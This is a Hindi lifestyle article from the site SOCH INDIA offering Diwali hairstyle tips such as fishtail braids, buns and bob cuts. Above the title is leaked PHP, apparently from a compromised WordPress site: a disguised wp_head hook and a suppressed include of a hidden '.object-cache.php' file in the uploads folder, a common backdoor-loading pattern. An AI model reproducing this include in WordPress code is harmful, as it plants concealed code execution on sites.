add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); इस दीवाली अपने बालों को बनाएं अलग स्टाइल से! – SOCH INDIA
Menu

मनोरंजन
इस दीवाली अपने बालों को बनाएं अलग स्टाइल से!

nobanner

जिस प्रकार मेकअप या ड्रेसेज पर दीवाली के दौरान ध्यान दिया जाता है, उसी प्रकार बालों पर भी ध्यान देना जरूरी है. आप इस बार जूड़ा या फिश टेल स्टाइल में बालों को संवार कर आप अलग अंदाज में नजर आ सकती हैं. ब्यूआटी एक्सूपर्ट और स्टार सैलून एंड एकेडमी की निदेशक आशमीन मुंजाल ने बालों को विभिन्न अंदाज में संवारने के सुझाव दिए हैं, जिसे अपनाकर आप भी अपनी पर्सनेलिटी में चार चांद लगा सकती हैं.

  • अपने बालों की ओर सबका ध्यान आकर्षित करने के लिए आप फ्रेंच हेयरस्टाइल के साथ फिश टेल को अपना सकती हैं.
  • एक तरफ कंधे पर लहराते घुंघराले बाल हर ड्रेस पर जंचते हैं.
  • फ्रेंच स्टाइल में दोनों तरफ चोटी करके फिर पोनी टोल बनाएं. यकीनन आप सबसे अलग नजर आएंगी.
  • साड़ी या लहंगे पर शाही अंदाज में नजर आने के लिए चोटी करके जूड़ा बनाएं या पफ बनाकर बालों को खुला रखें.
  • जो महिलाएं छोटे बाल रखना पसंद करती हैं वे एजीमेट्रिकल एंगल बॉब ब्लंट कट या लांग बॉब कट के जरिए बालों को स्टाइल कर सकती हैं.